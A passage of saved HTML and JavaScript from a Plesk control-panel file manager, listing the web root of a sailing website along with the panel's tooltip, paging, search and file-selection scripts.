                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>9 <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_favicon.ico" value="favicon.ico" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=favicon.ico" onClick="return bin();;lon();">favicon.ico</a></td><td class="number">17.1&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/favicon.ico" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=favicon.ico" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ffavicon.ico" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=favicon.ico" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_header.js" value="header.js" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=header.js" onClick=";lon();" onMouseOver="f(event, &#039;webscript&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_webscript.gif" width="16" height="16" alt="file_webscript.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=header.js" onClick=";lon();">header.js</a></td><td class="number">0.87&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/header.js" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=header.js" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fheader.js" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=header.js" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_index.html" value="index.html" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=index.html" onClick=";lon();" onMouseOver="f(event, &#039;webpage&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_webpage.gif" width="16" height="16" alt="file_webpage.gif" title=""></a></td><td><A href="/spaw/spaw.php?file_name=/httpdocs/index.html" onClick=";lon();">index.html</a></td><td class="number">9.12&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/index.html" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=index.html" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Findex.html" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=index.html" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>9 <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
